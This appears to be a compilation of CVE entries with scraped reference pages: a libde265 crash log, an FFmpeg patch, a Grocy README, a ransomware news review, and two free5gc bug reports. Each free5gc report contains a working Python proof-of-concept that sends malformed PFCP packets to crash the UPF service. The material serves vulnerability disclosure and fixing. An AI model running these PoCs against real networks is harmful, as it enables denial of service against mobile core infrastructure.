SQL injection vulnerability in LMXCMS v.1.4 allows attacker to execute arbitrary code via the TagsAction.class.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2021-35437: Vulns/lmxcms injection.md at main · GHA193/Vulns

Buffer Overflow vulnerability in strukturag libde265 v1.10.12 allows a local attacker to cause a denial of service via the slice_segment_header function in the slice.cc component.

**SEGV in libde265****Description**

Libde265 v1.0.12 was discovered to contain a SEGV via the function slice\_segment\_header::dump\_slice\_segment\_header at slice.cc.

**Version****ASAN Log**

./dec265/dec265 -c -d -f 153 poc1libde265

AddressSanitizer:DEADLYSIGNAL
=================================================================
==38==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000551716 bp 0x7ffff7ad66a0 sp 0x7fffffff3de0 T0)
==38==The signal is caused by a READ memory access.
==38==Hint: address points to the zero page.
    #0 0x551716 in slice\_segment\_header::dump\_slice\_segment\_header(decoder\_context const\*, int) const /afltest/libde265/libde265/slice.cc:1281:3
    #1 0x4db1b1 in decoder\_context::read\_slice\_NAL(bitreader&, NAL\_unit\*, nal\_header&) /afltest/libde265/libde265/decctx.cc:646:11
    #2 0x4e5626 in decoder\_context::decode\_NAL(NAL\_unit\*) /afltest/libde265/libde265/decctx.cc:1241:11
    #3 0x4e6247 in decoder\_context::decode(int\*) /afltest/libde265/libde265/decctx.cc:1329:16
    #4 0x4cd5c4 in main /afltest/libde265/dec265/dec265.cc:784:17
    #5 0x7ffff790d082 in \_\_libc\_start\_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16
    #6 0x41e66d in \_start (/afltest/libde265/dec265/dec265+0x41e66d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /afltest/libde265/libde265/slice.cc:1281:3 in slice\_segment\_header::dump\_slice\_segment\_header(decoder\_context const\*, int) const
==38==ABORTING

**Reproduction**

./autogen.sh
export CFLAGS="\-g -lpthread -fsanitize=address"
export CXXFLAGS="\-g -lpthread -fsanitize=address"
CC=clang CXX=clang++ ./configure --disable-shared
make -j 32

./dec265/dec265 -c -d -f 153 poc1libde265

**PoC**

poc1libde265: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc1libde265

**Reference**

https://github.com/strukturag/libde265

**Environment**

    ubuntu:20.04
    gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
    clang version 10.0.0-4ubuntu1
    afl-cc++4.09
    

**Credit**

Zeng Yunxiang  
Song Jiaxuan

CVE-2023-47471: SEGV in libde265 in slice_segment_header::dump_slice_segment_header · Issue #426 · strukturag/libde265

Buffer Overflow vulnerability in Ffmpeg before github commit 4565747056a11356210ed8edcecb920105e40b60 allows a remote attacker to achieve an out-of-array write, execute arbitrary code, and cause a denial of service (DoS) via the ref_pic_list_struct function in libavcodec/evc_ps.c

Expand Up

@@ -24,10 +24,14 @@

#define EXTENDED\_SAR 255

  

// @see ISO\_IEC\_23094-1 (7.3.7 Reference picture list structure syntax)

static int ref\_pic\_list\_struct(GetBitContext \*gb, RefPicListStruct \*rpl)

static int ref\_pic\_list\_struct(EVCParserSPS \*sps, GetBitContext \*gb, RefPicListStruct \*rpl)

{

uint32\_t delta\_poc\_st, strp\_entry\_sign\_flag \= 0;

rpl\->ref\_pic\_num \= get\_ue\_golomb\_long(gb);

  

if ((unsigned)rpl\->ref\_pic\_num \> sps\->sps\_max\_dec\_pic\_buffering\_minus1)

return AVERROR\_INVALIDDATA;

  

if (rpl\->ref\_pic\_num \> 0) {

delta\_poc\_st \= get\_ue\_golomb\_long(gb);

  

Expand Down Expand Up

@@ -239,6 +243,8 @@ int ff\_evc\_parse\_sps(GetBitContext \*gb, EVCParamSets \*ps)

sps\->max\_num\_tid0\_ref\_pics \= get\_ue\_golomb\_31(gb);

else {

sps\->sps\_max\_dec\_pic\_buffering\_minus1 \= get\_ue\_golomb\_long(gb);

if ((unsigned)sps\->sps\_max\_dec\_pic\_buffering\_minus1 \> 16 \- 1)

return AVERROR\_INVALIDDATA;

sps\->long\_term\_ref\_pic\_flag \= get\_bits1(gb);

sps\->rpl1\_same\_as\_rpl0\_flag \= get\_bits1(gb);

sps\->num\_ref\_pic\_list\_in\_sps\[0\] \= get\_ue\_golomb(gb);

Expand All

@@ -248,17 +254,23 @@ int ff\_evc\_parse\_sps(GetBitContext \*gb, EVCParamSets \*ps)

goto fail;

}

  

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[0\]; ++i)

ref\_pic\_list\_struct(gb, &sps\->rpls\[0\]\[i\]);

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[0\]; ++i) {

ret \= ref\_pic\_list\_struct(sps, gb, &sps\->rpls\[0\]\[i\]);

if (ret < 0)

goto fail;

}

  

if (!sps\->rpl1\_same\_as\_rpl0\_flag) {

sps\->num\_ref\_pic\_list\_in\_sps\[1\] \= get\_ue\_golomb(gb);

if ((unsigned)sps\->num\_ref\_pic\_list\_in\_sps\[1\] >= EVC\_MAX\_NUM\_RPLS) {

ret \= AVERROR\_INVALIDDATA;

goto fail;

}

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[1\]; ++i)

ref\_pic\_list\_struct(gb, &sps\->rpls\[1\]\[i\]);

for (int i \= 0; i < sps\->num\_ref\_pic\_list\_in\_sps\[1\]; ++i) {

ret \= ref\_pic\_list\_struct(sps, gb, &sps\->rpls\[1\]\[i\]);

if (ret < 0)

goto fail;

}

}

}

  

Expand Down

CVE-2023-47470: avcodec/evc_ps: Check ref_pic_num and sps_max_dec_pic_buffering_minus1 · FFmpeg/FFmpeg@4565747

Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.

**free5gc Buffer Overflow vulnerability**

Moderate severity GitHub Reviewed Published Nov 16, 2023 to the GitHub Advisory Database • Updated Nov 16, 2023

GHSA-6944-6pmv-6mp2: free5gc Buffer Overflow vulnerability

Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component.

**Give it a try**

*   Public demo of the latest stable version (release branch) → https://demo.grocy.info
*   Public demo of the current development version (master branch) → https://demo-prerelease.grocy.info

**Features**

See the website → https://grocy.info

**Questions / Help / Bug Reports / Feature Requests**

*   General help and usage questions → r/grocy subreddit
*   Bug Reports and Feature Requests → Issue Tracker

_Please don't send me private messages or call me regarding anything Grocy. I check the issue tracker and the subreddit pretty much daily, but don't provide any support beyond that._

**Community contributions**

See the website for a list of community contributed Add-ons / Tools. → https://grocy.info/addons

**How to install**

> Checkout Grocy Desktop, if you want to run Grocy without having to manage a webserver just like a normal (Windows) desktop application.
> 
> Directly download the latest release - the installation is nothing more than just clicking 2 times "next".

Grocy is technically a pretty simple PHP application, so the basic notes to get it running are:

*   Unpack the latest release
*   Copy config-dist.php to data/config.php + edit to your needs
*   Ensure that the data directory is writable
*   The webserver root should point to the public directory
*   Include try_files $uri /index.php$is_args$query_string; in your location block if you use nginx
    *   Or disable URL rewriting (see the option DISABLE_URL_REWRITING in data/config.php)
*   → Default login is user admin with password admin, please change the password immediately (user menu at the top right corner)

Alternatively clone this repository (the release branch always references the latest released version) and install Composer and Yarn dependencies manually.

See the website for more installation guides and troubleshooting help. → https://grocy.info/links

**Platform support**

*   PHP 8.1 or 8.2 (with SQLite 3.34.0+)
    *   Required PHP extensions: fileinfo, pdo_sqlite, gd, ctype, json, intl, zlib, mbstring
    *   _Recommendation: Benchmark tests showed that e.g. unit conversion handling is up to 5 times faster when using a more recent (3.39.4+) SQLite version._
*   Recent Firefox, Chrome or Edge

**How to run using Docker**

See grocy/grocy-docker or linuxserver/docker-grocy for instructions.

**How to update**

*   Overwrite everything with the latest release while keeping the data directory
*   Check config-dist.php for new configuration options and add them to your data/config.php where appropriate (the default values from config-dist.php will be used for not in data/config.php defined settings)
*   Empty the data/viewcache directory
*   Visit the main route once to apply database migrations (see below)

If you run Grocy on Linux, there is also update.sh (remember to make the script executable (chmod +x update.sh) and ensure that you have unzip installed) which does exactly this and additionally creates a backup (.tgz archive) of the current installation in data/backups (backups older than 60 days will be deleted during the update).

**Localization**

Grocy is fully localizable - the default language is English (integrated into code), a German localization is always maintained by me.

You can easily help translating Grocy on Transifex if your language is incomplete or not available yet.

The default language can be set in data/config.php, e. g. Setting('DEFAULT_LOCALE', 'it'); and there is also a user setting (see the user settings page) to set a different language per user.

The pre-release demo is available for any translation which is at least 70 % complete and will pull the translations from Transifex 10 minutes past every hour, so you can have a kind of instant preview of your contributed translations. Thank you!

Also any translation which once reached a completion level of 70 % (strings resource) will be included in releases.

_RTL languages are unfortunately not yet supported._

**Motivation**

A household needs to be managed. I did this so far (almost 10 years) with my first self written software (a C# Windows forms application) and with a bunch of Excel sheets. The software was a pain to use at the end and Excel is Excel. So I searched for and tried different things for a (very) long time, nothing 100 % fitted, so this is my aim for a "complete household management"-thing. ERP your fridge!

**Things worth to know****REST API**

See the integrated Swagger UI instance on /api.

**Barcode readers & camera scanning**

Some fields (with a barcode icon above) also allow to select a value by scanning a barcode. It works best when your barcode reader prefixes every barcode with a letter which is normally not part of a item name (I use a $) and sends a TAB after a scan.

Additionally it's also possible to use your device camera to scan a barcode by using the camera button on the right side of the corresponding field (powered by Quagga2, totally offline / client-side camera stream processing, please note due to browser security restrictions, this only works when serving Grocy via a secure connection (https://)). Quick video demo: https://www.youtube.com/watch?v=Y5YH6IJFnfc

_My personal recommendation: Use a USB barcode laser scanner. They are cheap and work 1000 % better, faster, under any lighting condition and from any angle._

**Input shorthands for date fields**

For (productivity) reasons all date (and time) input (and display) fields use the ISO-8601 format regardless of localization. The following shorthands are available:

*   MMDD gets expanded to the given day on the current year, if > today, or to the given day next year, if < today, in proper notation
    *   Example: 0517 will be converted to 2023-05-17
*   YYYYMMDD gets expanded to the proper ISO-8601 notation
    *   Example: 20230417 will be converted to 2023-04-17
*   YYYYMMe or YYYYMM+ gets expanded to the end of the given month in the given year in proper notation
    *   Example: 202307e will be converted to 2023-07-31
*   [+/-]n[d/m/y] gets expanded to a date relative to today, while adding (**+**) or subtracting (**\-**) the **n**umber of **d**ays/**m**onths/**y**ears, in proper notation
    *   Example: +1m will be converted to the same day next month
*   x gets expanded to 2999-12-31 (which is an alias for "never overdue")
*   Down/up arrow keys will increase/decrease the date by 1 day
*   Right/left arrow keys will increase/decrease the date by 1 week
*   Shift + down/up arrow keys will increase/decrease the date by 1 month
*   Shift + right/left arrow keys will increase/decrease the date by 1 year

**Keyboard shorthands for buttons**

Wherever a button contains a bold highlighted letter, this is a shortcut key. Example: Button "**P** Add as new product" can be "pressed" by using the P key on your keyboard.

**Barcode lookup via external services**

Products can be directly added to the database via looking them up against external services by a barcode.

This can be done in-place using the product picker workflow "External barcode lookup (via plugin)" (the workflow dialog is displayed when entering something unknown in any product input field).

There is no plugin included for any service, see the reference implementation in data/plugins/DemoBarcodeLookupPlugin.php.

**Database migrations**

Database schema migration is automatically done when visiting the root (/) route (click on the logo in the left upper edge).

_Please note: Database migrations are supposed to work between releases, not between every commit. If you want to run the current master branch (which is the development version), you need to handle that (and maybe more) yourself._

**Disable certain features**

If you don't use certain feature sets of Grocy (for example if you don't need "Chores"), there are feature flags per major feature set to hide/disable the related UI elements (see config-dist.php).

**Adding your own CSS or JS without to have to modify the application itself**

*   When the file data/custom_js.html exists, the contents of the file will be added just before </body> (end of body) on every page
*   When the file data/custom_css.html exists, the contents of the file will be added just before </head> (end of head) on every page

**Demo mode**

When the MODE setting is set to dev, demo or prerelease, the application will work in a demo mode which means authentication is disabled and some demo data will be generated during the database schema migration (pass the query parameter nodemodata, e.g. https://grocy.example.com/?nodemodata to skip that).

**Embedded mode**

When the file embedded.txt exists, it must contain a valid and writable path which will be used as the data directory instead of data and authentication will be disabled (used in Grocy Desktop).

In embedded mode, settings can be overridden by text files in data/settingoverrides, the file name must be <SettingName>.txt (e. g. BASE_URL.txt) and the content must be the setting value (normally one single line).

**Contributing / Say Thanks**

Any help is welcome, feel free to contribute anything which comes to your mind or see https://grocy.info/#say-thanks if you just want to say thanks.

**Roadmap**

There is none, this is a hobby project. The progress of a specific bug/enhancement is always tracked in the corresponding issue, at least by commit comment references.

Milestones are used to indicate in which version the corresponding request was done (vNEXT means it's currently planned to do that for the next release).

**Screenshots****Stock overview**

**Shopping List**

**Meal Plan**

**Chores overview**

**License**

The MIT License (MIT)

CVE-2023-48200: GitHub - grocy/grocy: ERP beyond your fridge - Grocy is a web-based self-hosted groceries & household management solution for your home

In September, two high-profile casino breaches taught us about the nuances of the RaaS affiliate landscape, the asymmetric dangers of phishing, and of two starkly different approaches to ransomware negotiation.

_This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, “known attacks” are those where the victim **did not** pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

In October, 318 new victims were posted on ransomware leak sites. The top active gangs were LockBit (64), NoEscape (40), and PLAY (36). Major stories for the month included the takedown of several high-profile groups, including alleged Sony Systems attacker RansomedVC, new data shedding light on Cl0p’s education sector bias, and a deep-dive revealing the danger of the group behind September’s infamous casino attacks.

Last month three major ransomware groups—RansomedVC, Ragnar, and Trigona—were shut down, the first two by law enforcement and the third by Ukrainian hacktivists. Let’s dive into RansomedVC, a group which burst onto the scene in August and quickly gained notoriety for allegedly breaching several well-known companies. In late October, the lead hacker behind the group was seen on Telegram trying to sell the operation. Just days later, the account announced that it was “putting an end to” the group after learning that six of its affiliates may have been arrested. The group had posted 42 victims on their leak site at the time of their take down.

While law enforcement is yet to come forward confirming the RansomedVC arrests, the same is not true for RagnarLocker group, which Europol and Eurojust announced they had taken down last month. RagnarLocker started in 2019 and was responsible for numerous high-profile attacks against municipalities and critical infrastructure across the world. At the time of the takedown action, the group had posted a total of 42 victims on their leak site.

Trigona’s demise, on the other hand, was not at the hands of investigators but activists, highlighting the impact that broader geopolitical struggles can have on the ransomware landscape. In mid-October, the Ukrainian Cyber Alliance (UCA) breached the Trigona Confluence server and completely deleted and defaced their sites. Formed around 2016 to defend Ukraine’s cyberspace against Russian interference, the UCA used a public exploit for CVE-2023-22515 to gain access to Trigona infrastructure. Trigona is responsible for at least 30 attacks across various sectors since first emerging in October 2022.

Known ransomware attacks by ransomware group, October 2023

Known ransomware attacks by country, October 2023

Known ransomware attacks by industry sector, October 2023

In other October news, Resilience, a cyber insurance company, reported that 48% of all MOVEit cyberattack victims in its client base during the first half of 2023 were from the education sector. This suggests a possible targeting preference of the Cl0p campaign towards educational institutions. However, this figure might not fully represent the situation.

For instance, if Resilience has a higher proportion of clients in the education sector, it could bias the data towards that sector. On the other hand, data from Malwarebytes indeed indicates that while the education sector comprises only 3% of all MOVEit hosts, they account for 6% of the victims. However, this trend is likely not due to a deliberate focus by Cl0p, whose attacks were more opportunistic in scope, but rather because educational sectors often have fewer resources to promptly address vulnerabilities like those in MOVEit. Thus, the bias observed is more circumstantial than intentional. At any rate, given that the education sector frequently relies on third-party applications like MOVEit, the impact of Cl0p’s activities serves as a stark reminder for these institutions to adopt robust third-party security best practices.

Microsoft’s deep dive into Scattered Spider last month shed new light on the relatively new, albeit dangerous, ransomware gang who made headlines in September for attacking MGM Resorts and Caesar Entertainment. For small security teams, one of the most important findings about the group is their use of Living Of The Land (LOTL) techniques to avoid detection: Scattered Spider employs everyday tools like PowerShell for reconnaissance and stealthily alters network settings to bypass security measures. They also exploit identity providers and modify security systems, blending their malicious activities with normal network operations.

With the success of groups like Scattered Spider increasingly relying on LOTL attacks, it’s vital for defenders to focus on detecting anomalous activities within legitimate tools and network configurations. Strengthening monitoring and analysis capabilities can help identify and counter the subtle, sophisticated techniques employed by these ransomware gangs.

**New(?) player: Hunters International**

Hunters International is a new ransomware player suspected to be a rebrand of the Hive ransomware, which was shutdown in January 2023 by law enforcement. Despite Hunters International’s denial, claiming they are a distinct entity that purchased Hive’s source code, the overlap in their malware’s coding and functionality suggests a direct lineage from Hive.

Their activity, though limited, includes a notable attack on a UK school.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Ransomware review: November 2023 

An issue discovered in OpenCart 4.0.0.0 to 4.0.2.3 allows authenticated backend users having common/security write privilege can write arbitrary untrusted data inside config.php and admin/config.php, resulting in remote code execution on the underlying server.

CVE-2023-47444: Static Code Injections in OpenCart (CVE-2023-47444)

Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP messages whose Sequence Number is mutated to overflow bytes.

\[Bugs\] UPF crash caused by malformed PFCP message whose Sequence Number is mutated to overflow bytes

**Describe the bug**

While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Sequence Number is mutated to overflow bytes (e.g. 0xFF 0xFF 0xFF 0xFF). This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash.

**To Reproduce**

Steps to reproduce the behavior:

1.  Build the UPF with source code
2.  Run the bin/upf with default config/upfcfg.yaml
3.  Run the following POC python script

#!/usr/bin/env python3

import socket

udp\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_DGRAM)
udp\_socket.settimeout(1.0)

pfcp\_association\_setup\_request \= b'\\x20\\x05\\x00\\x1f\\x00\\x00\\x01\\x00\\x00\\x3c\\x00\\x05\\x00\\x0a\\x64\\xc8\\x64\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30\\x00\\x2b\\x00\\x06\\x21\\x00\\x00\\x00\\x00\\x00'

pfcp\_heartbeat\_request \= b'\\x20\\x01\\x00\\x0f\\x00\\x00\\x00\\xff\\xff\\xff\\x00\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30'

udp\_socket.sendto(pfcp\_association\_setup\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.sendto(pfcp\_heartbeat\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.close()

**Expected behavior**

Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check the total length of PFCP messages, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF.

**Screenshots**

No special screenshot is provided.

**Environment (please complete the following information):**

*   free5GC Version: v3.3.0
*   OS: Ubuntu 20.04
*   Kernel version: 5.4.5-050405-generic
*   go version: go1.21.1 linux/amd64

**Trace File****Configuration File**

No specific configuration is required.

**PCAP File**

No specific pcap file is provided.

**Log File**

2023-10-24T17:49:15.614745280+08:00 \[INFO\]\[UPF\]\[CFG\] ==================================================
2023-10-24T17:49:15.614761831+08:00 \[INFO\]\[UPF\]\[Main\] Log level is set to \[info\]
2023-10-24T17:49:15.614777264+08:00 \[INFO\]\[UPF\]\[Main\] Report Caller is set to \[false\]
2023-10-24T17:49:15.614837834+08:00 \[INFO\]\[UPF\]\[Main\] starting Gtpu Forwarder \[gtp5g\]
2023-10-24T17:49:15.614864772+08:00 \[INFO\]\[UPF\]\[Main\] GTP Address: "127.0.0.8:2152"
2023-10-24T17:49:15.650332227+08:00 \[INFO\]\[UPF\]\[BUFF\] buff netlink server started
2023-10-24T17:49:15.650439249+08:00 \[INFO\]\[UPF\]\[Perio\] perio server started
2023-10-24T17:49:15.650444691+08:00 \[INFO\]\[UPF\]\[Gtp5g\] Forwarder started
2023-10-24T17:49:15.652112097+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] starting pfcp server
2023-10-24T17:49:15.652132290+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] pfcp server started
2023-10-24T17:49:15.652138607+08:00 \[INFO\]\[UPF\]\[Main\] UPF started
2023-10-24T17:50:42.343823681+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] handleAssociationSetupRequest
2023-10-24T17:50:42.343962121+08:00 \[INFO\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\]\[CPNodeID:10.100.200.100\] New node
2023-10-24T17:50:42.347048969+08:00 \[FATA\]\[UPF\]\[PFCP\]\[LAddr:127.0.0.8:8805\] panic: runtime error: slice bounds out of range \[6:4\]
goroutine 10 \[running\]:
runtime/debug.Stack()
	/usr/local/go/src/runtime/debug/stack.go:24 +0x65
github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main.func1()
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x5d
panic({0x860400, 0xc000490210})
	/usr/local/go/src/runtime/panic.go:1038 +0x215
github.com/wmnsk/go-pfcp/ie.(\*IE).UnmarshalBinary(0x10000c0000cbb30, {0xc000490200, 0x20, 0x30})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:371 +0x1a5
github.com/wmnsk/go-pfcp/ie.Parse({0xc000490200, 0xb, 0xb})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:339 +0x48
github.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc000490200, 0x13, 0x13})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:632 +0x8c
github.com/wmnsk/go-pfcp/message.(\*HeartbeatRequest).UnmarshalBinary(0xc000096720, {0xc0004901f8, 0x0, 0xadaa82a41536e5d2})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0x6e
github.com/wmnsk/go-pfcp/message.Parse({0xc0004901f8, 0x13, 0x13})
	/home/lee/gowork/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x3ab
github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main(0xc000400a90, 0xc0004030d0)
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x4ce
created by github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).Start
	/home/lee/Downloads/free5gc/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xd2

CVE-2023-47347: [Bugs] UPF crash caused by malformed PFCP messages whose Sequence Number is mutated to overflow bytes · Issue #496 · free5gc/free5gc

\[Bugs\] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero

**Describe the bug**

While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Recovery Time Stamp IE length is mutated to zero. This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash.

**To Reproduce**

Steps to reproduce the behavior:

1.  Build the UPF with source code
2.  Run the bin/upf with default config/upfcfg.yaml
3.  Run the following POC python script

#!/usr/bin/env python3

import socket

udp\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_DGRAM)
udp\_socket.settimeout(1.0)

pfcp\_association\_setup\_request \= b'\\x20\\x05\\x00\\x1f\\x00\\x00\\x01\\x00\\x00\\x3c\\x00\\x05\\x00\\x0a\\x64\\xc8\\x64\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30\\x00\\x2b\\x00\\x06\\x21\\x00\\x00\\x00\\x00\\x00'

"""
 PFCP Heartbeat Request with a Recovery Time Stamp IE whose length is mutated to zero
"""
pfcp\_heartbeat\_request \= b'\\x20\\x01\\x00\\x0c\\x00\\x00\\x02\\x00\\x00\\x60\\x00\\x00\\xe8\\x1f\\xe7\\xb4'

udp\_socket.sendto(pfcp\_association\_setup\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.sendto(pfcp\_heartbeat\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.close()

**Expected behavior**

Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check the IE length of PFCP messages, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF.

**Screenshots**

No special screenshot is provided.

**Environment (please complete the following information):**

*   free5GC Version: v3.3.0
*   OS: Ubuntu 20.04
*   Kernel version: 5.4.5-050405-generic
*   go version: go1.21.1 linux/amd64

**Trace File****Configuration File**

No specific configuration is required.

**PCAP File**

No specific pcap file is provided.

**Log File**

time="2023-09-22T03:24:35.891194467+08:00" level="info" msg="UPF version:  \\n\\tNot specify ldflags (which link version) during go build\\n\\tgo version: go1.21.1 linux/amd64" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.904235696+08:00" level="info" msg="Read config from \[upfcfg.yaml\]" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.904663072+08:00" level="info" msg="\==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.904772210+08:00" level="info" msg="(\*factory.Config)(0xc0000147d0)({\\n\\tVersion: (string) (len=5) \\"1.0.3\\",\\n\\tDescription: (string) (len=31) \\"UPF initial local configuration\\",\\n\\tPfcp: (\*factory.Pfcp)(0xc00006f170)({\\n\\t\\tAddr: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\tNodeID: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\tRetransTimeout: (time.Duration) 1s,\\n\\t\\tMaxRetrans: (uint8) 3\\n\\t}),\\n\\tGtpu: (\*factory.Gtpu)(0xc00006f320)({\\n\\t\\tForwarder: (string) (len=5) \\"gtp5g\\",\\n\\t\\tIfList: (\[\]factory.IfInfo) (len=1 cap=1) {\\n\\t\\t\\t(factory.IfInfo) {\\n\\t\\t\\t\\tAddr: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\t\\t\\tType: (string) (len=2) \\"N3\\",\\n\\t\\t\\t\\tName: (string) \\"\\",\\n\\t\\t\\t\\tIfName: (string) \\"\\",\\n\\t\\t\\t\\tMTU: (uint32) 0\\n\\t\\t\\t}\\n\\t\\t}\\n\\t}),\\n\\tDnnList: (\[\]factory.DnnList) (len=1 cap=1) {\\n\\t\\t(factory.DnnList) {\\n\\t\\t\\tDnn: (string) (len=8) \\"internet\\",\\n\\t\\t\\tCidr: (string) (len=12) \\"10.60.0.0/24\\",\\n\\t\\t\\tNatIfName: (string) \\"\\"\\n\\t\\t}\\n\\t},\\n\\tLogger: (\*factory.Logger)(0xc000022e40)({\\n\\t\\tEnable: (bool) true,\\n\\t\\tLevel: (string) (len=4) \\"info\\",\\n\\t\\tReportCaller: (bool) false\\n\\t})\\n})\\n" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.905047979+08:00" level="info" msg="\==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.905060906+08:00" level="info" msg="Log level is set to \[info\]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905071569+08:00" level="info" msg="Report Caller is set to \[false\]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905097803+08:00" level="info" msg="starting Gtpu Forwarder \[gtp5g\]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905106855+08:00" level="info" msg="GTP Address: \\"127.0.0.8:2152\\"" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.955858915+08:00" level="info" msg="buff netlink server started" CAT="BUFF" NF="UPF"
time="2023-09-22T03:24:35.956003408+08:00" level="info" msg="perio server started" CAT="Perio" NF="UPF"
time="2023-09-22T03:24:35.956021132+08:00" level="info" msg="Forwarder started" CAT="Gtp5g" NF="UPF"
time="2023-09-22T03:24:35.965098244+08:00" level="info" msg="starting pfcp server" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:35.965152469+08:00" level="info" msg="pfcp server started" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:35.965258101+08:00" level="info" msg="UPF started" CAT="Main" NF="UPF"
